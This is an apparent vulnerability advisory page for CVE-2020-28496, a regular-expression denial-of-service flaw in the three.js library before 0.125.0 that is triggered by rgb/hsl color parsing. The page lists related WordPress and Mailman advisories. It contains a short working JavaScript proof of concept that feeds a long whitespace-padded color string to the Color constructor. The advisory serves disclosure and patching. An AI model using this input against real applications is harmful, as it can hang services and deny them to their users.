Description

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")

Remediation

References

CVE-2020-28496

Related Vulnerabilities

WordPress Plugin Enable Media Replace Arbitrary File Upload (4.0.1)

WordPress Plugin PublishPress Capabilities-User Role Access, Editor Permissions, Admin Menus Security Bypass (2.3)

Mailman Insufficiently Protected Credentials Vulnerability (CVE-2021-43332)

WordPress Plugin WooCommerce PDF Invoices & Packing Slips Cross-Site Request Forgery (2.2.6)

WordPress Plugin Adminimize 'page' Parameter Cross-Site Scripting (1.7.21)

Severity

High

Classification

CVE-2020-28496 CWE-400

Tags

Missing Update Known Vulnerabilities